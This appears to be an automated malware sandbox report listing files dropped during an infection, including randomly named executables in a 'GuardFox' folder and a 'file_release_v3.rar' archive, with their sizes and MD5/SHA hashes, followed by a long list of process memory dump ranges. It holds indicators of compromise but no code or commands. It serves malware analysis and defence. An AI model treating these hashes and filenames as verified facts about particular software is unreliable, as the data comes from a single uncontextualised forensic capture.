f9ac50c8a561147abb7da38901cc08b6d9fd42943d15655712945ee0a4e767e0029a0536b08634010014a0d30a3a2e221bb3c9417a0c5e85630ec48883345492

Download Submit
C:\Users\Admin\Documents\GuardFox\r2UFDQC620faMK7tnGEjaJBS.exe

Filesize
64KB

MD5
0a813d6abd47eae3baf8dbcaddf24a52

SHA1
253c37fe5732be836bb49475fce1074592c4aa6f

SHA256
5a6eede3cbf5bc4c4b24a6e258dad25a80f47605899589251b7534e206e9fa73

SHA512
4fb87e2d21d11103d6888f7bb1bd0d03c6a3380bb323c2017ae184ed6bb16e21512085b7623da1604bc96afabda229301f14eb7c5c12e41b995be79ea51de82f

Download Submit
C:\Users\Admin\Documents\GuardFox\r2UFDQC620faMK7tnGEjaJBS.exe

Filesize
4.5MB

MD5
8e02fd1b378b1fd44b8aeada99bffba8

SHA1
35b1c7dbbe6d687d688afef696eeaf9bb316341c

SHA256
08a1b7d938b2499e3592762507e28198bba635e670cdd520805dc3e4b95b3665

SHA512
af8881b654d2f8b451b0a183ed141a479dd252a48fb76ce45d5e925ff033b92827deffcab12c16cd9ef627bc89eedae82bfecfbfa0851ea083cd45b242f7c4f8

Download Submit
C:\Users\Admin\Documents\GuardFox\rZUqtgFOnTXixEJY_mn7T2Sl.exe

Filesize
243KB

MD5
8e582355d02b45f536e72cf17091877a

SHA1
dc606ad9dec14725003f9ef1c0fd30e5ff3b29eb

SHA256
fb7ffefe60cfd0ef95468b27cb5028b11b1b397ae15e55d9ca7f8fbd14ca342e

SHA512
644c1f8ed0563606c7eccf0b095a8c3e34200c58f244d6ad89e7705242f5ba6f26772681883e0e5c8d8d5d741bcca3cb0a51c91d82ec622e8a9ef27dae9f1082

Download Submit
C:\Users\Admin\Documents\GuardFox\z_9pT7lPvHJWD2vdqiPXgDd8.exe

Filesize
128KB

MD5
a7f72b56e63b6e45158cb4bea763adfa

SHA1
44c725660221e39f1b58887b6e3f661d0f3be89a

SHA256
b91a9d0e4940aac3f8725d7d661b999dbe226a8390917feb8610dce27803664f

SHA512
96a807e069a630547e8e959514c3df0242e87bf606aa2525f4fdb7c567efbf83e4c84460bb8ca5afdd9e7436a998e77c86534b4a40f1935bb36edbd841b400c3

Download Submit
C:\Users\Admin\Documents\GuardFox\z_9pT7lPvHJWD2vdqiPXgDd8.exe

Filesize
929KB

MD5
805284eca72fd8aceecb1e33cb50422f

SHA1
949b2fec6246e7ce60939ce672fbb02ac109d071

SHA256
b318ef2c034f1b6b4954696735c407a83b7196d338178b6774cd53f55a024488

SHA512
f5a8d4a7390deb27f1e57ff861c9c81caf907cfb13b2e58fda445833e3ceff2e19c120b658207e091b168ca50a87afca41570772f1992ab68632461466ab5130

Download Submit
C:\Users\Admin\Documents\GuardFox\z_9pT7lPvHJWD2vdqiPXgDd8.exe

Filesize
192KB

MD5
c14374110ef9fa8ba5eee00949ef28f8

SHA1
b7f1f16af9e1e83bfb445f3cfae2cf80aaaa95fa

SHA256
4ee244c97e169d9ea660655bd6eac6553ab71856b8815b514eee0d83e84ee6d3

SHA512
5b9677b5a28cbc7623375bf9360ba692715b764dcdaf5cf7b2293569031588900706599f42e3f9f7d6ad91d4059395efa6b52b64783a3aa1c35ccd63069a6ffc

Download Submit
C:\Users\Admin\Documents\GuardFox\z_9pT7lPvHJWD2vdqiPXgDd8.exe

Filesize
1.8MB

MD5
e4619d88b0282cd9adeeecd348ff93d9

SHA1
a33bd0e7e674ed0bb40eb656783368274782cdc8

SHA256
6e94b34cc64185a4f602eb03363797cbc7d52c04837d91b6beabb2d8843436e0

SHA512
c5c73498eda7d0253649029b6a645cb32ae581d3176b7d82fb174453d4b6f0549c92291bcd8de7028696f0f37abb407e5547d6704405f3ea949838a7b104565e

Download Submit
C:\Users\Admin\Downloads\file_release_v3.rar

Filesize
17.2MB

MD5
5050b2e6c0f96d61180e992bd6a43df5

SHA1
afc30c8cfd29329f43e13871afd490977168ab47

SHA256
a020f867fd17bc216c7ac920e74f747811dd3b282cd9ffbfcf805c2100f712b3

SHA512
4414e0c72cf52c505d34fb4487c0874f8535c7bb11f16c894376d5e91f0a7f6360762820b17bc8bbc008026740038f4546db7c11f9bc6bbc0962c12ce305ce64

Download Submit
C:\Users\Admin\Downloads\file_release_v3.rar

Filesize
1.2MB

MD5
adc726cb9548c65b9f1e5cee01df6313

SHA1
b81b9e46467f03c20080e9f1af06bb435a53575a

SHA256
e02c35b03b95fce000ec01dc607f41d176e18db1859fb70bd0502d5718f8c996

SHA512
fd247e10e1fb025d738e25c6a8556a9a213b292283701b0a77160825ca82abb84c4449209e03a74ea0117cd73bc8ff4b99e63ba0e0793abb1ff40ec42acc05a3

Download Submit
C:\Users\Admin\Downloads\file_release_v3.rar:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
memory/224-1304-0x00000000009C0000-0x0000000000A10000-memory.dmp

Filesize
320KB

Download
memory/224-1363-0x0000000072820000-0x0000000072FD1000-memory.dmp

Filesize
7.7MB

Download
memory/1284-1328-0x0000000000490000-0x0000000001213000-memory.dmp

Filesize
13.5MB

Download
memory/1604-522-0x00007FFF00030000-0x00007FFF00031000-memory.dmp

Filesize
4KB

Download
memory/1604-524-0x0000000140000000-0x00000001409C3000-memory.dmp

Filesize
9.8MB

Download
memory/1604-517-0x0000000140000000-0x00000001409C3000-memory.dmp

Filesize
9.8MB

Download
memory/1604-527-0x00007FFF48EA0000-0x00007FFF490A9000-memory.dmp

Filesize
2.0MB

Download
memory/1604-526-0x0000000140000000-0x00000001409C3000-memory.dmp

Filesize
9.8MB

Download
memory/1604-528-0x0000000140000000-0x00000001409C3000-memory.dmp

Filesize
9.8MB

Download
memory/1604-536-0x0000000140000000-0x00000001409C3000-memory.dmp

Filesize
9.8MB

Download
memory/1604-1105-0x00007FFF00010000-0x00007FFF00011000-memory.dmp

Filesize
4KB

Download
memory/1604-525-0x00007FFF46820000-0x00007FFF46B94000-memory.dmp

Filesize
3.5MB

Download
memory/1604-518-0x00007FFF48200000-0x00007FFF482BD000-memory.dmp

Filesize
756KB

Download
memory/1604-684-0x00007FFF46820000-0x00007FFF46B94000-memory.dmp

Filesize
3.5MB

Download
memory/1604-1321-0x0000000140000000-0x00000001409C3000-memory.dmp

Filesize
9.8MB

Download
memory/1604-519-0x00007FFF48200000-0x00007FFF482BD000-memory.dmp

Filesize
756KB

Download
memory/1604-1324-0x00007FFF46820000-0x00007FFF46B94000-memory.dmp

Filesize
3.5MB

Download
memory/1604-516-0x0000000140000000-0x00000001409C3000-memory.dmp

Filesize
9.8MB

Download
memory/1604-1326-0x00007FFF48200000-0x00007FFF482BD000-memory.dmp

Filesize
756KB

Download
memory/1604-693-0x00007FFF48EA0000-0x00007FFF490A9000-memory.dmp

Filesize
2.0MB

Download
memory/1604-1330-0x00007FFF48EA0000-0x00007FFF490A9000-memory.dmp

Filesize
2.0MB

Download
memory/1604-521-0x00007FFF00000000-0x00007FFF00002000-memory.dmp

Filesize
8KB

Download
memory/1604-523-0x0000000140000000-0x00000001409C3000-memory.dmp

Filesize
9.8MB

Download
memory/1604-1116-0x0000000140000000-0x00000001409C3000-memory.dmp

Filesize
9.8MB

Download
memory/1604-520-0x0000000140000000-0x00000001409C3000-memory.dmp

Filesize
9.8MB

Download
memory/1604-677-0x0000000140000000-0x00000001409C3000-memory.dmp

Filesize
9.8MB

Download
memory/1604-582-0x0000000140000000-0x00000001409C3000-memory.dmp

Filesize
9.8MB

Download
memory/2312-1316-0x0000000006A80000-0x0000000006D5C000-memory.dmp

Filesize
2.9MB

Download
memory/2312-1487-0x00000000052C0000-0x00000000052D0000-memory.dmp

Filesize
64KB

Download
memory/2312-1298-0x0000000005420000-0x0000000005777000-memory.dmp

Filesize
3.3MB

Download
memory/2312-1293-0x0000000005380000-0x000000000541C000-memory.dmp

Filesize
624KB

Download
memory/2312-1292-0x0000000000340000-0x000000000098A000-memory.dmp

Filesize
6.3MB

Download
memory/2416-1332-0x0000000000E50000-0x0000000001AB0000-memory.dmp

Filesize
12.4MB

Download
memory/3328-1296-0x0000000002760000-0x0000000002776000-memory.dmp

Filesize
88KB

Download
memory/3392-1355-0x0000000001530000-0x0000000001531000-memory.dmp

Filesize
4KB

Download
memory/3392-1369-0x00000000017C0000-0x00000000017C1000-memory.dmp

Filesize
4KB

Download
memory/3392-1365-0x00000000017B0000-0x00000000017B1000-memory.dmp

Filesize
4KB

Download
memory/3392-1358-0x0000000001540000-0x0000000001541000-memory.dmp

Filesize
4KB

Download
memory/3392-1373-0x00000000017D0000-0x00000000017D1000-memory.dmp

Filesize
4KB

Download
memory/3392-1378-0x00000000017E0000-0x00000000017E1000-memory.dmp

Filesize
4KB

Download
memory/3580-1200-0x0000000000400000-0x0000000000768000-memory.dmp

Filesize
3.4MB

Download
memory/3580-1196-0x0000000000400000-0x0000000000768000-memory.dmp

Filesize
3.4MB

Download
memory/4064-1343-0x0000000000470000-0x00000000010C3000-memory.dmp

Filesize
12.3MB

Download
memory/4084-1325-0x0000000004FF0000-0x000000000519A000-memory.dmp

Filesize
1.7MB

Download
memory/4084-1322-0x0000000005360000-0x0000000005906000-memory.dmp

Filesize
5.6MB

Download
memory/4084-1305-0x00000000051B0000-0x000000000535C000-memory.dmp

Filesize
1.7MB

Download
memory/4084-1374-0x0000000072820000-0x0000000072FD1000-memory.dmp

Filesize
7.7MB

Download
memory/4536-1129-0x0000000140000000-0x00000001409C3000-memory.dmp

Filesize
9.8MB

Download
memory/4536-681-0x00007FFF46820000-0x00007FFF46B94000-memory.dmp

Filesize
3.5MB

Download
memory/4536-1138-0x0000000140000000-0x00000001409C3000-memory.dmp

Filesize
9.8MB

Download
memory/4536-1141-0x0000000140000000-0x00000001409C3000-memory.dmp

Filesize
9.8MB

Download
memory/4536-1194-0x0000000140000000-0x00000001409C3000-memory.dmp

Filesize
9.8MB

Download
memory/4536-1195-0x00007FFF48200000-0x00007FFF482BD000-memory.dmp

Filesize
756KB

Download
memory/4536-1199-0x00007FFF46820000-0x00007FFF46B94000-memory.dmp

Filesize
3.5MB

Download
memory/4536-1098-0x0000000140000000-0x00000001409C3000-memory.dmp

Filesize
9.8MB

Download
memory/4536-1198-0x00007FFF48EA0000-0x00007FFF490A9000-memory.dmp

Filesize
2.0MB

Download
memory/4536-742-0x00007FFF48EA0000-0x00007FFF490A9000-memory.dmp

Filesize
2.0MB

Download
memory/4536-679-0x0000000140000000-0x00000001409C3000-memory.dmp

Filesize
9.8MB

Download
memory/4536-690-0x0000000140000000-0x00000001409C3000-memory.dmp

Filesize
9.8MB

Download
memory/4536-683-0x00007FFF48200000-0x00007FFF482BD000-memory.dmp

Filesize
756KB

Download
memory/4536-682-0x00007FFF48200000-0x00007FFF482BD000-memory.dmp

Filesize
756KB

Download
memory/4536-680-0x0000000140000000-0x00000001409C3000-memory.dmp

Filesize
9.8MB

Download
memory/4740-1311-0x0000000002360000-0x000000000247B000-memory.dmp

Filesize
1.1MB

Download
memory/4740-1308-0x00000000020AF000-0x0000000002141000-memory.dmp

Filesize
584KB

Download
memory/5176-1295-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/5176-1318-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/5176-1310-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/5176-1300-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/5400-1338-0x0000000010000000-0x000000001056B000-memory.dmp

Filesize
5.4MB

Download
memory/5540-1262-0x0000000004A50000-0x0000000004A5B000-memory.dmp

Filesize
44KB

Download
memory/5540-1302-0x0000000000400000-0x0000000002D34000-memory.dmp

Filesize
41.2MB

Download
memory/5540-1204-0x0000000002ED0000-0x0000000002FD0000-memory.dmp

Filesize
1024KB

Download
memory/5540-1307-0x0000000000400000-0x0000000002D34000-memory.dmp

Filesize
41.2MB

Download
memory/5560-1201-0x0000000000400000-0x0000000002D37000-memory.dmp

Filesize
41.2MB

Download
memory/5560-1136-0x0000000002FC0000-0x0000000002FF4000-memory.dmp

Filesize
208KB

Download
memory/5560-1377-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/5572-1409-0x0000000072820000-0x0000000072FD1000-memory.dmp

Filesize
7.7MB

Download
memory/5572-1320-0x0000000005540000-0x000000000578A000-memory.dmp

Filesize
2.3MB

Download
memory/5572-1335-0x00000000052E0000-0x0000000005528000-memory.dmp

Filesize
2.3MB

Download
memory/5576-1496-0x0000000005660000-0x0000000005661000-memory.dmp

Filesize
4KB

Download
memory/5576-1498-0x0000000005600000-0x0000000005601000-memory.dmp

Filesize
4KB

Download
memory/5576-1506-0x0000000005640000-0x0000000005641000-memory.dmp

Filesize
4KB

Download
memory/5576-1502-0x00000000055F0000-0x00000000055F1000-memory.dmp

Filesize
4KB

Download
memory/5576-1501-0x0000000000A90000-0x000000000103B000-memory.dmp

Filesize
5.7MB

Download
memory/5576-1493-0x0000000005610000-0x0000000005611000-memory.dmp

Filesize
4KB

Download
memory/5576-1131-0x0000000000A90000-0x000000000103B000-memory.dmp

Filesize
5.7MB

Download
memory/5576-1484-0x00000000777C6000-0x00000000777C8000-memory.dmp

Filesize
8KB

Download
memory/5576-1490-0x0000000005630000-0x0000000005631000-memory.dmp

Filesize
4KB

Download
memory/5584-1480-0x0000000000400000-0x0000000003117000-memory.dmp

Filesize
45.1MB

Download
memory/5584-1462-0x0000000005280000-0x0000000005B6B000-memory.dmp

Filesize
8.9MB

Download
memory/5600-1337-0x0000000002F20000-0x0000000002F2B000-memory.dmp

Filesize
44KB

Download
memory/5600-1334-0x0000000002E3B000-0x0000000002E51000-memory.dmp

Filesize
88KB

Download
memory/5600-1309-0x0000000000400000-0x0000000002D34000-memory.dmp

Filesize
41.2MB

Download
memory/5612-1317-0x0000000002FB0000-0x0000000002FDD000-memory.dmp

Filesize
180KB

Download
memory/5612-1314-0x0000000003050000-0x0000000003150000-memory.dmp

Filesize
1024KB

Download
memory/5612-1342-0x0000000000400000-0x0000000002D3A000-memory.dmp

Filesize
41.2MB

Download
memory/5624-1133-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/5624-1115-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/5696-1340-0x0000000000400000-0x0000000000449000-memory.dmp

Filesize
292KB

Download
memory/5696-1350-0x0000000000400000-0x0000000000449000-memory.dmp

Filesize
292KB

Download
memory/5696-1361-0x0000000000400000-0x0000000000449000-memory.dmp

Filesize
292KB

Download
memory/5760-1346-0x0000000000400000-0x000000000066F000-memory.dmp

Filesize
2.4MB

Download
memory/5760-1357-0x0000000000400000-0x000000000066F000-memory.dmp

Filesize
2.4MB

Download
memory/5760-1371-0x0000000000400000-0x000000000066F000-memory.dmp

Filesize
2.4MB

Download
memory/6080-1459-0x00000000020C0000-0x00000000020C1000-memory.dmp

Filesize
4KB

Download